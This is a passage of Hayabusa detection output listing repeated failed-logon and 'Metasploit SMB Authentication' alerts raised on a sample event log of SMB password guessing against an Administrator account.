NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
